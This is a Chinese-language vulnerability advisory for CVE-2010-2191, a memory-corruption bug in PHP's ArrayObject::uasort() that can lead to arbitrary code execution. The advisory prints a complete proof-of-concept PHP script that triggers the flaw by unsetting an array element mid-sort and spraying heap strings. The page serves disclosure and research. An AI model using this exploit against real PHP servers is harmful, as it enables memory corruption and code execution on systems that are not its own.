发布日期:2010-05-31
更新日期:2010-06-28受影响系统:
PHP PHP <= 5.3.2
PHP PHP <= 5.2.13
描述:
--------------------------------------------------------------------------------
CVE ID: CVE-2010-2191PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。PHP的ArrayObject::uasort()方式没有正确地处理中断情况,可能触发内存破坏,导致执行任意代码。<*来源:Stefan Esser (s.esser@ematters.de)
链接:http://www.php-security.org/2010/05/31/mops-2010-055-php-arrayobjectuasort-interruption-memory-corruption-vulnerability/index.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<?php
error_Reporting(E_ALL);
$first = true;
function uc($a,$b)
{
global $first;
/* Detect 32 vs 64 bit */
$i = 0x7fffffff;
$i++;
if (is_float($i)) {
$y = str_repeat("A", 39);
} else {
$y = str_repeat("A", 67);
}
if ($first) {
unset($GLOBALS["arr"]["B"]);
$GLOBALS["_____________________________________________________________________________a"] = 1;
$GLOBALS["_____________________________________________________________________________b"] = 2;
$GLOBALS["_____________________________________________________________________________x"] .= $y;
}
$first=false;
} $arr = new ArrayObject(array("A" => str_repeat("A", 164),"B" => str_repeat("B", 164), "C" => str_repeat("C", 164), "D" => str_repeat("D", 164)));
$arr->uasort("uc");
?>建议:
--------------------------------------------------------------------------------
厂商补丁:PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.php.netPHP unpack()函数中断处理信息泄露漏洞Bugzilla时间追踪功能信息泄露漏洞相关资讯 PHP
- PHP代码规范的10个好习惯 (12/05/2015 08:20:04)
- PHP 性能分析与实验:性能的宏观分 (08/19/2015 19:48:24)
- 在 Linux 命令行中使用和执行 PHP (07/30/2015 10:07:32)
| - PHP 性能分析与实验:性能的微观分 (09/13/2015 20:49:27)
- PHP 和 Node.js 的对决 (08/06/2015 08:51:28)
- 在 Linux 命令行中使用和执行 PHP (07/29/2015 13:15:46)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明
|